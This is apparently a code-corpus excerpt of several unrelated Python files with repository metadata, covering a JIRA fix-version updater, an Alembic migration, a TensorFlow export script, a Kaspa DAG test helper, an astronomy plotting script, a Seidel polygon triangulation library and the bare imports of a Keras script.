elif len(ids) == 1:
jira_id = ids[0]
elif not ids:
# if we don't find GOBBLIN-X, see if jira_id is an int
try:
jira_id = 'GOBBLIN-{}'.format(abs(int(jira_id)))
except ValueError:
raise click.UsageError(
'JIRA id must be an integer or have the form GOBBLIN-X')
return jira_id
def update_jira_issue(fix_version):
"""
Update JIRA issue
fix_version: the version to assign to the Gobblin JIRAs.
"""
try:
import jira.client
except ImportError:
print("Could not find jira-python library; exiting. Run "
"'sudo pip install jira' to install.")
sys.exit(-1)
# ASF JIRA username
JIRA_USERNAME = os.environ.get("JIRA_USERNAME", '')
if not JIRA_USERNAME:
JIRA_USERNAME = TMP_CREDENTIALS.get('JIRA_USERNAME', '')
# ASF JIRA password
JIRA_PASSWORD = os.environ.get("JIRA_PASSWORD", '')
if not JIRA_PASSWORD:
JIRA_PASSWORD = TMP_CREDENTIALS.get('JIRA_PASSWORD', '')
if not JIRA_USERNAME:
JIRA_USERNAME = click.prompt(
click.style('Username for Gobblin JIRA', fg='blue', bold=True),
type=str)
click.echo(
'Set a JIRA_USERNAME env var to avoid this prompt in the future.')
TMP_CREDENTIALS['JIRA_USERNAME'] = JIRA_USERNAME
if JIRA_USERNAME and not JIRA_PASSWORD:
JIRA_PASSWORD = keyring.get_password("gobblin-pr", JIRA_USERNAME)
if JIRA_PASSWORD:
click.echo("Obtained password from keyring. To reset remove it there.")
if not JIRA_PASSWORD:
JIRA_PASSWORD = click.prompt(
click.style('Password for Gobblin JIRA', fg='blue', bold=True),
type=str,
hide_input=True)
if JIRA_USERNAME and JIRA_PASSWORD:
if click.confirm(click.style("Would you like to store your password "
"in your keyring?", fg='blue', bold=True)):
register(JIRA_USERNAME, JIRA_PASSWORD)
TMP_CREDENTIALS['JIRA_PASSWORD'] = JIRA_PASSWORD
try:
asf_jira = jira.client.JIRA(
{'server': JIRA_API_BASE},
basic_auth=(JIRA_USERNAME, JIRA_PASSWORD))
except:
raise ValueError('Could not log in to JIRA!')
for jira_obj in asf_jira.search_issues('filter=12342798', startAt=0, maxResults=2000):
jira_id = jira_obj.key
click.echo("Processing JIRA: %s" % jira_id)
try:
issue = asf_jira.issue(jira_id)
fixVersions = []
for version in issue.fields.fixVersions:
fixVersions.append({'name': version.name})
fixVersions.append({'name': fix_version})
issue.update(fields={'fixVersions': fixVersions})
except Exception as e:
raise ValueError(
"ASF JIRA could not find issue {}\n{}".format(jira_id, e))
def update_jira_issues():
fix_version = click.prompt(
click.style(
"Enter fix version", fg='blue', bold=True),
default=None)
if fix_version == None:
raise click.UsageError('No fix version specified')
update_jira_issue(
fix_version=fix_version)
if __name__ == "__main__":
try:
update_jira_issues()
except:
raise
|
[
"abhishektiwari.btech@gmail.com"
] |
abhishektiwari.btech@gmail.com
|
|
d48e94c2e6566443a5f4da190cd17c660f99d236
|
d03da8f6518fca612daafc6cd856c1ee21e82087
|
/migrations/versions/56bf3c2acb25_comments.py
|
94d21e2ead182984afdc50695e941a960b72ab5d
|
[] |
no_license
|
kiudou/flask_again
|
78df06dc2a3f810b19d6aa734f207cef0adf60b3
|
74f5816f8cf94b18d6325497eb49486700173aa9
|
refs/heads/master
| 2022-12-01T22:34:39.978973
| 2018-04-18T05:53:34
| 2018-04-18T05:53:34
| 111,967,303
| 0
| 1
| null | 2022-11-28T10:58:27
| 2017-11-25T01:21:40
|
Python
|
UTF-8
|
Python
| false
| false
| 1,288
|
py
|
"""comments
Revision ID: 56bf3c2acb25
Revises: ecf568fe583e
Create Date: 2018-01-11 22:01:35.622098
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '56bf3c2acb25'
down_revision = 'ecf568fe583e'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('comment',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('body', sa.Text(), nullable=True),
sa.Column('body_html', sa.Text(), nullable=True),
sa.Column('timestamp', sa.DateTime(), nullable=True),
sa.Column('disabled', sa.Boolean(), nullable=True),
sa.Column('author_id', sa.Integer(), nullable=True),
sa.Column('post_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['author_id'], ['users.id'], ),
sa.ForeignKeyConstraint(['post_id'], ['posts.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_comment_timestamp'), 'comment', ['timestamp'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_comment_timestamp'), table_name='comment')
op.drop_table('comment')
# ### end Alembic commands ###
|
[
"qidong120@hotmail.com"
] |
qidong120@hotmail.com
|
aa3a7e324554a6b388c08bf4a9817c9ece2af45e
|
3114632ff07ee00bae1b2f0fa60df372aec247e2
|
/model/lstm/export.py
|
cfaa591237e0fd8188643c397a9bcb2acf95c37e
|
[] |
no_license
|
linguishi/chinese_sentiment
|
fabbb10f6efb2fe41488c23ec6a48e7b0439b7e7
|
06bdc816c678a4998bb04576bd76d3cae118c4c2
|
refs/heads/master
| 2022-11-05T20:53:30.785979
| 2022-10-22T15:43:20
| 2022-10-22T15:43:20
| 162,000,470
| 678
| 96
| null | 2022-06-21T21:40:16
| 2018-12-16T12:49:29
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 789
|
py
|
from pathlib import Path
import json
import tensorflow as tf
from main import model_fn
PARAMS = './results/params.json'
MODEL_DIR = './results/model'
def serving_input_receiver_fn():
words = tf.placeholder(dtype=tf.string, shape=[None, None], name='words')
nwords = tf.placeholder(dtype=tf.int32, shape=[None], name='nwords')
receiver_tensors = {'words': words, 'nwords': nwords}
features = {'words': words, 'nwords': nwords}
return tf.estimator.export.ServingInputReceiver(features, receiver_tensors)
if __name__ == '__main__':
with Path(PARAMS).open(encoding='utf-8') as f:
params = json.load(f)
estimator = tf.estimator.Estimator(model_fn, MODEL_DIR, params=params)
estimator.export_saved_model('saved_model', serving_input_receiver_fn)
|
[
"513228837@qq.com"
] |
513228837@qq.com
|
9611e6b173e8da2152c8313f4dd5182e6e2c6d2e
|
66a087ce740887a26dae70b96e468ce860cb971d
|
/src/cli.py
|
6e9270a33db54eb31e1d5c58e37391477dc71fc7
|
[] |
no_license
|
lshin/foodtruck-cli
|
7a1e2964aa48a810c216647293f2b8c33b83a621
|
b446f4454df89bc438f7b2f49e722f727b698ff1
|
refs/heads/master
| 2021-01-19T14:21:19.432110
| 2017-09-25T21:40:10
| 2017-09-25T21:40:10
| 100,899,721
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,126
|
py
|
"""
show_open_food_trucks
Usage:
show_open_food_trucks
show_open_food_trucks [--limit=<number>]
show_open_food_trucks -h | --help
show_open_food_trucks --version
Options:
-h --help Show this screen.
--version Show version.
--limit=<number> A number of items to display [default: 10].
Examples:
show_open_food_trucks
"""
from inspect import getmembers, isclass
from docopt import docopt
from . import __version__ as VERSION
def main():
"""
Read all options of commands with docopt
http://docopt.org/
"""
import commands
options = docopt(__doc__, version=VERSION)
for name, val in options.iteritems():
_command_run(commands, options, name)
else:
_command_run(commands, options, 'foodtruck')
def _command_run(commands, options, name):
if hasattr(commands, name):
module = getattr(commands, name)
commands = getmembers(module, isclass)
command = [command[1] for command in commands if command[0] != 'Base'][0]
command = command(options)
command.run()
|
[
"leo@sh1n.com"
] |
leo@sh1n.com
|
59cafbd895db387e940013040b0c5cf818e776ae
|
f8450a92c000667ef7f5f437a789ead015b8f140
|
/kaspad/kaspa_dags/dag_tools/chains_dag.py
|
67fddb15d7a26fc1ec787eca327476264a63a3c0
|
[] |
no_license
|
fakecoinbase/kaspanetslashkaspy_tools
|
ee467c18160e3db9059e8d30d42fe56fb8ad8af7
|
61ec322757a5f543da68e5d0c0ce1606edd1bf89
|
refs/heads/master
| 2023-03-30T19:53:14.491784
| 2020-07-25T16:43:30
| 2020-07-25T16:43:30
| 282,572,688
| 0
| 0
| null | 2021-03-26T00:01:03
| 2020-07-26T04:06:09
|
Python
|
UTF-8
|
Python
| false
| false
| 2,497
|
py
|
import os
import subprocess
from kaspy_tools.local_run.run_local_services import run_services
from kaspy_tools.kaspad.utilities import block_generator
from kaspy_tools.kaspad.json_rpc import json_rpc_requests
from kaspy_tools.kaspad.kaspa_dags.dag_tools import save_restore_dags
from kaspy_tools.logs import config_logger
KT_logger = config_logger.get_kaspy_tools_logger()
def make_and_submit_single_chain(*, floors=None, pay_address, conn):
if not floors:
floors=[]
for f in floors:
floor_blocks = []
for b in range(f):
new_block, block_hash = block_generator.generate_valid_block_from_template(conn=conn, native_txs=[],
pay_address=pay_address)
floor_blocks.append(new_block)
for block in floor_blocks:
response, response_json = json_rpc_requests.submit_block_request(block.hex(), options=None, conn=conn)
def get_current_blocks(conn):
raw_blocks, verbose_blocks = json_rpc_requests.get_blocks(requested_blocks_count=200, conn=conn)
return raw_blocks
def submit_saved_blocks(saved_blocks, conn):
for block in saved_blocks:
response, response_json = json_rpc_requests.submit_block_request(block, options=None, conn=conn)
def clean_blocks(*, dir_name='kaspad'):
run_services.stop_and_remove_all_runners()
save_restore_dags.clear_dag_files(work_dir=dir_name)
run_services.run_kaspanet_services()
def get_blocks_from_chain(*, chain_definition=None, clear=True, pay_address, conn):
if clear:
clean_blocks()
make_and_submit_single_chain(floors=chain_definition, pay_address=pay_address, conn=conn)
chain_blocks = get_current_blocks(conn=conn)
return chain_blocks
def make_chains_dag(conn, pay_address):
chain_one = get_blocks_from_chain(chain_definition=[1,1,1,1,1], conn=conn, pay_address=pay_address)
# when we get the blocks for chain_two, we clean blocks of chain_one
chain_two = get_blocks_from_chain(chain_definition=[2,1], conn=conn, pay_address=pay_address)
# Now chain_two is submitted, we submit chain_one
submit_saved_blocks(saved_blocks=chain_one, conn=conn)
# Now chain_one AND chain_two are submitted
# getting chain_three without clearing:
chain_three = get_blocks_from_chain(chain_definition=[1 for i in range(110)], clear=False, conn=conn,
pay_address=pay_address)
# now submit
|
[
"noreply@github.com"
] |
fakecoinbase.noreply@github.com
|
e7922df463850164f98f54a547ff341ee05336f4
|
9f3f36b6485a5d3fc5647414e921a7e31be8075d
|
/procedure_06252015.py
|
0b87c488e16ff453291cbc591cbb6694b5ab2f5f
|
[] |
no_license
|
nhuntwalker/new_work_scripts
|
10993c367d0fa042160f4d451f4f0b3c286600b9
|
1f6b572b8eae8cf5208f621e65db16c64f52bdb4
|
refs/heads/master
| 2021-01-25T04:02:35.474688
| 2016-02-24T02:23:14
| 2016-02-24T02:23:14
| 32,169,135
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,715
|
py
|
from thesiscode.quality import *
from thesiscode.plotting import *
import pandas as pd
simbad = Data(pd.read_csv("../samples/simbad_allwise_allmatches.dat", sep="|"))
macho = Data(pd.read_csv("../samples/macho_allwise_allmatches.dat", sep="|"))
ogle = Data(pd.read_csv("../samples/ogle_allwise_allmatches.dat", sep="|"))
simbad.clean_me()
macho.clean_me()
ogle.clean_me()
simbad.cut_me((simbad.data["coljk"] > 1.1) & (simbad.data["col23"] > 0.3), "J-K > 1.1 and W2-W3 > 0.3")
simplot = Plot(simbad.cutdata)
simplot.plot_colorcolor_completeness(simbad.cleaned, "coljk", "col23", "J-K", "W2-W3", xlims=(-0.5,5), ylims=(-0.5,5), vmin=0.0, vmax=1.0, cbar=True)
simplot.reset_figure()
simplot.plot_galactic_completeness(simbad.cleaned, "glon", "glat", xlims=(-180,180), vmin=0.0, vmax=1.0, cbar=True)
simplot.reset_figure()
macho.cut_me((macho.data["coljk"] > 1.1) & (macho.data["col23"] > 0.3), "J-K > 1.1 and W2-W3 > 0.3")
machoplot = Plot(macho.cutdata)
machoplot.plot_colorcolor_completeness(macho.cleaned, "coljk", "col23", "J-K", "W2-W3", xlims=(-0.5,5), ylims=(-0.5,5), vmin=0.0, vmax=1.0, cbar=True)
machoplot.reset_figure()
machoplot.plot_galactic_completeness(macho.cleaned, "glon", "glat", xlims=(-180,180), vmin=0.0, vmax=1.0, cbar=True)
machoplot.reset_figure()
ogle.cut_me((ogle.data["coljk"] > 1.1) & (ogle.data["col23"] > 0.3), "J-K > 1.1 and W2-W3 > 0.3")
ogleplot = Plot(ogle.cutdata)
ogleplot.plot_colorcolor_completeness(ogle.cleaned, "coljk", "col23", "J-K", "W2-W3", xlims=(-0.5,5), ylims=(-0.5,5), vmin=0.0, vmax=1.0, cbar=True)
ogleplot.reset_figure()
ogleplot.plot_galactic_completeness(ogle.cleaned, "glon", "glat", xlims=(-180,180), vmin=0.0, vmax=1.0, cbar=True)
ogleplot.reset_figure()
|
[
"nhuntwalker@gmail.com"
] |
nhuntwalker@gmail.com
|
ee04b89a047c94c9b8b1a8c8c05de21ed4ddfde2
|
6562b410385bb444316eda3c054fff9662d7e727
|
/polytri/seidel.py
|
98621e2ad84d3cf9549b976ae295b84ecac6afd8
|
[
"LicenseRef-scancode-public-domain-disclaimer"
] |
permissive
|
mhearne-usgs/polytri
|
92a11c367936047e3b0f8b66e1b7949049323192
|
a8f5513df8d2a2b31ccf9db45ebd588d58a12f8c
|
refs/heads/master
| 2021-01-23T16:37:23.310212
| 2014-10-06T14:38:16
| 2014-10-06T14:38:16
| 24,344,232
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 21,211
|
py
|
#
# Poly2Tri
# Copyright (c) 2009, Mason Green
# http://code.google.com/p/poly2tri/
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# self list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# self list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# Neither the name of Poly2Tri nor the names of its contributors may be
# used to endorse or promote products derived from self software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from random import shuffle
from math import atan2
##
## Based on Raimund Seidel'e paper "A simple and fast incremental randomized
## algorithm for computing trapezoidal decompositions and for triangulating polygons"
## (Ported from poly2tri)
##
# Shear transform. May effect numerical robustness
SHEAR = 1e-3
class Point(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.next, self.prev = None, None
def __sub__(self, other):
if isinstance(other, Point):
return Point(self.x - other.x, self.y - other.y)
else:
return Point(self.x - other, self.y - other)
def __add__(self, other):
if isinstance(other, Point):
return Point(self.x + other.x, self.y + other.y)
else:
return Point(self.x + other, self.y + other)
def __mul__(self, f):
return Point(self.x * f, self.y * f)
def __div__(self, a):
return Point(self.x / a, self.y / a)
def cross(self, p):
return self.x * p.y - self.y * p.x
def dot(self, p):
return self.x * p.x + self.y * p.y
def length(self):
return sqrt(self.x * self.x + self.y * self.y)
def normalize(self):
return self / self.length()
def less(self, p):
return self.x < p.x
def neq(self, other):
return other.x != self.x or other.y != self.y
def clone(self):
return Point(self.x, self.y)
def orient2d(pa, pb, pc):
acx = pa.x - pc.x;
bcx = pb.x - pc.x;
acy = pa.y - pc.y;
bcy = pb.y - pc.y;
return acx * bcy - acy * bcx;
class Edge(object):
def __init__(self, p, q):
self.p = p
self.q = q
self.slope = (q.y - p.y) / (q.x - p.x) if q.x - p.x != 0 else 0
self.b = p.y - (p.x * self.slope)
self.above, self.below = None, None
self.mpoints = [p, q]
def is_above(self, point):
return orient2d(self.p, self.q, point) < 0
def is_below(self, point):
return orient2d(self.p, self.q, point) > 0
def add_mpoint(self, point):
for mp in self.mpoints:
if not mp.neq(point): return
self.mpoints.append(point)
class Trapezoid(object):
def __init__(self, left_point, right_point, top, bottom):
self.left_point = left_point
self.right_point = right_point
self.top = top
self.bottom = bottom
self.upper_left = None
self.upper_right = None
self.lower_left = None
self.lower_right = None
self.inside = True
self.sink = None
self.key = hash(self)
def update_left(self, ul, ll):
self.upper_left = ul
if ul != None: ul.upper_right = self
self.lower_left = ll
if ll != None: ll.lower_right = self
def update_right(self, ur, lr):
self.upper_right = ur
if ur != None: ur.upper_left = self
self.lower_right = lr
if lr != None: lr.lower_left = self
def update_left_right(self, ul, ll, ur, lr):
self.upper_left = ul
if ul != None: ul.upper_right = self
self.lower_left = ll
if ll != None: ll.lower_right = self
self.upper_right = ur
if ur != None: ur.upper_left = self
self.lower_right = lr
if lr != None: lr.lower_left = self
def trim_neighbors(self):
if self.inside:
self.inside = False
if self.upper_left != None: self.upper_left.trim_neighbors()
if self.lower_left != None: self.lower_left.trim_neighbors()
if self.upper_right != None: self.upper_right.trim_neighbors()
if self.lower_right != None: self.lower_right.trim_neighbors()
def contains(self, point):
return (point.x > self.left_point.x and point.x < self.right_point.x and
self.top.is_above(point) and self.bottom.is_below(point))
def vertices(self):
v1 = line_intersect(self.top, self.left_point.x)
v2 = line_intersect(self.bottom, self.left_point.x)
v3 = line_intersect(self.bottom, self.right_point.x)
v4 = line_intersect(self.top, self.right_point.x)
return v1, v2, v3, v4
def add_points(self):
if self.left_point is not self.bottom.p:
self.bottom.add_mpoint(self.left_point)
if self.right_point is not self.bottom.q:
self.bottom.add_mpoint(self.right_point)
if self.left_point is not self.top.p:
self.top.add_mpoint(self.left_point)
if self.right_point is not self.top.q:
self.top.add_mpoint(self.right_point)
def area(self):
p = list(self.vertices())
x0 = p[0][0]; y0 = p[0][1]
x1 = p[1][0]; y1 = p[1][1]
return 0.5 * abs(sum(x0*y1 - x1*y0
for ((x0, y0), (x1, y1)) in self.segments(p)))
def segments(self, p):
return zip(p, p[1:] + [p[0]])
def line_intersect(edge, x):
y = edge.slope * x + edge.b
return x, y
class Triangulator(object):
##
## Number of points should be > 3
##
def __init__(self, poly_line):
self.polygons = []
self.trapezoids = []
self.xmono_poly = []
self.edge_list = self.init_edges(poly_line)
self.trapezoidal_map = TrapezoidalMap()
self.bounding_box = self.trapezoidal_map.bounding_box(self.edge_list)
self.query_graph = QueryGraph(isink(self.bounding_box))
self.process()
def triangles(self):
triangles = []
for p in self.polygons:
verts = []
for v in p:
verts.append((v.x, v.y))
triangles.append(verts)
return triangles
def trapezoid_map(self):
return self.trapezoidal_map.map
# Build the trapezoidal map and query graph
def process(self):
for edge in self.edge_list:
traps = self.query_graph.follow_edge(edge)
for t in traps:
# Remove old trapezods
del self.trapezoidal_map.map[t.key]
# Bisect old trapezoids and create new
cp = t.contains(edge.p)
cq = t.contains(edge.q)
if cp and cq:
tlist = self.trapezoidal_map.case1(t, edge)
self.query_graph.case1(t.sink, edge, tlist)
elif cp and not cq:
tlist = self.trapezoidal_map.case2(t, edge)
self.query_graph.case2(t.sink, edge, tlist)
elif not cp and not cq:
tlist = self.trapezoidal_map.case3(t, edge)
self.query_graph.case3(t.sink, edge, tlist)
else:
tlist = self.trapezoidal_map.case4(t, edge)
self.query_graph.case4(t.sink, edge, tlist)
# Add new trapezoids to map
for t in tlist:
self.trapezoidal_map.map[t.key] = t
self.trapezoidal_map.clear()
# Mark outside trapezoids w/ depth-first search
for k, t in self.trapezoidal_map.map.items():
self.mark_outside(t)
# Collect interior trapezoids
for k, t in self.trapezoidal_map.map.items():
if t.inside:
self.trapezoids.append(t)
t.add_points()
# Generate the triangles
self.create_mountains()
def mono_polies(self):
polies = []
for x in self.xmono_poly:
polies.append(x.monoPoly)
return polies
def create_mountains(self):
for edge in self.edge_list:
if len(edge.mpoints) > 2:
mountain = MonotoneMountain()
points = merge_sort(edge.mpoints)
for p in points:
mountain.add(p)
mountain.process()
for t in mountain.triangles:
self.polygons.append(t)
self.xmono_poly.append(mountain)
def mark_outside(self, t):
if t.top is self.bounding_box.top or t.bottom is self.bounding_box.bottom:
t.trim_neighbors()
def init_edges(self, points):
edge_list = []
size = len(points)
for i in range(size):
j = i + 1 if i < size-1 else 0
p = points[i][0], points[i][1]
q = points[j][0], points[j][1]
edge_list.append((p, q))
return self.order_edges(edge_list)
def order_edges(self, edge_list):
edges = []
for e in edge_list:
p = shear_transform(e[0])
q = shear_transform(e[1])
if p.x > q.x:
edges.append(Edge(q, p))
else:
edges.append(Edge(p, q))
# Randomized incremental algorithm
shuffle(edges)
return edges
def shear_transform(point):
return Point(point[0] + SHEAR * point[1], point[1])
def merge_sort(l):
if len(l)>1 :
lleft = merge_sort(l[:len(l)/2])
lright = merge_sort(l[len(l)/2:])
p1, p2, p = 0, 0, 0
while p1<len(lleft) and p2<len(lright):
if lleft[p1].x < lright[p2].x:
l[p]=lleft[p1]
p+=1
p1+=1
else:
l[p]=lright[p2]
p+=1
p2+=1
if p1<len(lleft):l[p:]=lleft[p1:]
elif p2<len(lright):l[p:]=lright[p2:]
else : print "internal error"
return l
class TrapezoidalMap(object):
def __init__(self):
self.map = {}
self.margin = 50.0
self.bcross = None
self.tcross = None
def clear(self):
self.bcross = None
self.tcross = None
def case1(self, t, e):
trapezoids = []
trapezoids.append(Trapezoid(t.left_point, e.p, t.top, t.bottom))
trapezoids.append(Trapezoid(e.p, e.q, t.top, e))
trapezoids.append(Trapezoid(e.p, e.q, e, t.bottom))
trapezoids.append(Trapezoid(e.q, t.right_point, t.top, t.bottom))
trapezoids[0].update_left(t.upper_left, t.lower_left)
trapezoids[1].update_left_right(trapezoids[0], None, trapezoids[3], None)
trapezoids[2].update_left_right(None, trapezoids[0], None, trapezoids[3])
trapezoids[3].update_right(t.upper_right, t.lower_right)
return trapezoids
def case2(self, t, e):
rp = e.q if e.q.x == t.right_point.x else t.right_point
trapezoids = []
trapezoids.append(Trapezoid(t.left_point, e.p, t.top, t.bottom))
trapezoids.append(Trapezoid(e.p, rp, t.top, e))
trapezoids.append(Trapezoid(e.p, rp, e, t.bottom))
trapezoids[0].update_left(t.upper_left, t.lower_left)
trapezoids[1].update_left_right(trapezoids[0], None, t.upper_right, None)
trapezoids[2].update_left_right(None, trapezoids[0], None, t.lower_right)
self.bcross = t.bottom
self.tcross = t.top
e.above = trapezoids[1]
e.below = trapezoids[2]
return trapezoids
def case3(self, t, e):
lp = e.p if e.p.x == t.left_point.x else t.left_point
rp = e.q if e.q.x == t.right_point.x else t.right_point
trapezoids = []
if self.tcross is t.top:
trapezoids.append(t.upper_left)
trapezoids[0].update_right(t.upper_right, None)
trapezoids[0].right_point = rp
else:
trapezoids.append(Trapezoid(lp, rp, t.top, e))
trapezoids[0].update_left_right(t.upper_left, e.above, t.upper_right, None)
if self.bcross is t.bottom:
trapezoids.append(t.lower_left)
trapezoids[1].update_right(None, t.lower_right)
trapezoids[1].right_point = rp
else:
trapezoids.append(Trapezoid(lp, rp, e, t.bottom))
trapezoids[1].update_left_right(e.below, t.lower_left, None, t.lower_right)
self.bcross = t.bottom
self.tcross = t.top
e.above = trapezoids[0]
e.below = trapezoids[1]
return trapezoids
def case4(self, t, e):
lp = e.p if e.p.x == t.left_point.x else t.left_point
trapezoids = []
if self.tcross is t.top:
trapezoids.append(t.upper_left)
trapezoids[0].right_point = e.q
else:
trapezoids.append(Trapezoid(lp, e.q, t.top, e))
trapezoids[0].update_left(t.upper_left, e.above)
if self.bcross is t.bottom:
trapezoids.append(t.lower_left)
trapezoids[1].right_point = e.q
else:
trapezoids.append(Trapezoid(lp, e.q, e, t.bottom))
trapezoids[1].update_left(e.below, t.lower_left)
trapezoids.append(Trapezoid(e.q, t.right_point, t.top, t.bottom))
trapezoids[2].update_left_right(trapezoids[0], trapezoids[1], t.upper_right, t.lower_right)
return trapezoids
def bounding_box(self, edges):
margin = self.margin
max = edges[0].p + margin
min = edges[0].q - margin
for e in edges:
if e.p.x > max.x: max = Point(e.p.x + margin, max.y)
if e.p.y > max.y: max = Point(max.x, e.p.y + margin)
if e.q.x > max.x: max = Point(e.q.x + margin, max.y)
if e.q.y > max.y: max = Point(max.x, e.q.y + margin)
if e.p.x < min.x: min = Point(e.p.x - margin, min.y)
if e.p.y < min.y: min = Point(min.x, e.p.y - margin)
if e.q.x < min.x: min = Point(e.q.x - margin, min.y)
if e.q.y < min.y: min = Point(min.x, e.q.y - margin)
top = Edge(Point(min.x, max.y), Point(max.x, max.y))
bottom = Edge(Point(min.x, min.y), Point(max.x, min.y))
left = top.p
right = top.q
trap = Trapezoid(left, right, top, bottom)
self.map[trap.key] = trap
return trap
class Node(object):
def __init__(self, lchild, rchild):
self.parent_list = []
self.lchild = lchild
self.rchild = rchild
if lchild != None:
lchild.parent_list.append(self)
if rchild != None:
rchild.parent_list.append(self)
def replace(self, node):
for parent in node.parent_list:
if parent.lchild is node:
parent.lchild = self
else:
parent.rchild = self
self.parent_list += node.parent_list
class Sink(Node):
def __init__(self, trapezoid):
super(Sink, self).__init__(None, None)
self.trapezoid = trapezoid
trapezoid.sink = self
def locate(self, edge):
return self
def isink(trapezoid):
if trapezoid.sink is None:
return Sink(trapezoid)
return trapezoid.sink
class XNode(Node):
def __init__(self, point, lchild, rchild):
super(XNode, self).__init__(lchild, rchild)
self.point = point
def locate(self, edge):
if edge.p.x >= self.point.x:
return self.rchild.locate(edge)
return self.lchild.locate(edge)
class YNode(Node):
def __init__(self, edge, lchild, rchild):
super(YNode, self).__init__(lchild, rchild)
self.edge = edge
def locate(self, edge):
if self.edge.is_above(edge.p):
return self.rchild.locate(edge)
if self.edge.is_below(edge.p):
return self.lchild.locate(edge)
if edge.slope < self.edge.slope:
return self.rchild.locate(edge)
return self.lchild.locate(edge)
class QueryGraph:
def __init__(self, head):
self.head = head
def locate(self, edge):
return self.head.locate(edge).trapezoid
def follow_edge(self, edge):
trapezoids = [self.locate(edge)]
while(edge.q.x > trapezoids[-1].right_point.x):
if edge.is_above(trapezoids[-1].right_point):
trapezoids.append(trapezoids[-1].upper_right)
else:
trapezoids.append(trapezoids[-1].lower_right)
return trapezoids
def replace(self, sink, node):
if sink.parent_list:
node.replace(sink)
else:
self.head = node
def case1(self, sink, edge, tlist):
yNode = YNode(edge, isink(tlist[1]), isink(tlist[2]))
qNode = XNode(edge.q, yNode, isink(tlist[3]))
pNode = XNode(edge.p, isink(tlist[0]), qNode)
self.replace(sink, pNode)
def case2(self, sink, edge, tlist):
yNode = YNode(edge, isink(tlist[1]), isink(tlist[2]))
pNode = XNode(edge.p, isink(tlist[0]), yNode)
self.replace(sink, pNode)
def case3(self, sink, edge, tlist):
yNode = YNode(edge, isink(tlist[0]), isink(tlist[1]))
self.replace(sink, yNode)
def case4(self, sink, edge, tlist):
yNode = YNode(edge, isink(tlist[0]), isink(tlist[1]))
qNode = XNode(edge.q, yNode, isink(tlist[2]))
self.replace(sink, qNode)
PI_SLOP = 3.1
class MonotoneMountain:
def __init__(self):
self.size = 0
self.tail = None
self.head = None
self.positive = False
self.convex_points = set()
self.mono_poly = []
self.triangles = []
self.convex_polies = []
def add(self, point):
if self.size is 0:
self.head = point
self.size = 1
elif self.size is 1:
self.tail = point
self.tail.prev = self.head
self.head.next = self.tail
self.size = 2
else:
self.tail.next = point
point.prev = self.tail
self.tail = point
self.size += 1
def remove(self, point):
next = point.next
prev = point.prev
point.prev.next = next
point.next.prev = prev
self.size -= 1
def process(self):
self.positive = self.angle_sign()
self.gen_mono_poly()
p = self.head.next
while p.neq(self.tail):
a = self.angle(p)
if a >= PI_SLOP or a <= -PI_SLOP or a == 0:
self.remove(p)
elif self.is_convex(p):
self.convex_points.add(p)
p = p.next
self.triangulate()
def triangulate(self):
while self.convex_points:
ear = self.convex_points.pop()
a = ear.prev
b = ear
c = ear.next
triangle = (a, b, c)
self.triangles.append(triangle)
self.remove(ear)
if self.valid(a):
self.convex_points.add(a)
if self.valid(c):
self.convex_points.add(c)
#assert self.size <= 3, "Triangulation bug, please report"
def valid(self, p):
return p.neq(self.head) and p.neq(self.tail) and self.is_convex(p)
def gen_mono_poly(self):
p = self.head
while(p != None):
self.mono_poly.append(p)
p = p.next
def angle(self, p):
a = p.next - p
b = p.prev - p
return atan2(a.cross(b), a.dot(b))
def angle_sign(self):
a = self.head.next - self.head
b = self.tail - self.head
return atan2(a.cross(b), a.dot(b)) >= 0
def is_convex(self, p):
if self.positive != (self.angle(p) >= 0):
return False
return True
|
[
"mhearne@usgs.gov"
] |
mhearne@usgs.gov
|
de93e5cf2d408f47553fd7c91b6ce4c6e791ddc0
|
a57087659b4a87d0b8d83f022c916181658c2b2e
|
/model/repeat_attack.py.bak3
|
36fb5fd0b9769efb0cbc69b576fef5e0c7c13fa6
|
[] |
no_license
|
slzoo/Research_In_DataScience_FinalTerm
|
25340ac3dafff7324084e72321f99cd4a8555bf7
|
d60f5ff5606ba5bbfb6f35917811816969791130
|
refs/heads/master
| 2023-01-31T14:39:23.267600
| 2020-12-19T13:34:58
| 2020-12-19T13:34:58
| 322,836,521
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,603
|
bak3
|
import numpy as np
from itertools import combinations
import keras
from keras import models
from keras import optimizers
from keras.callbacks import ModelCheckpoint
from keras.models import load_model
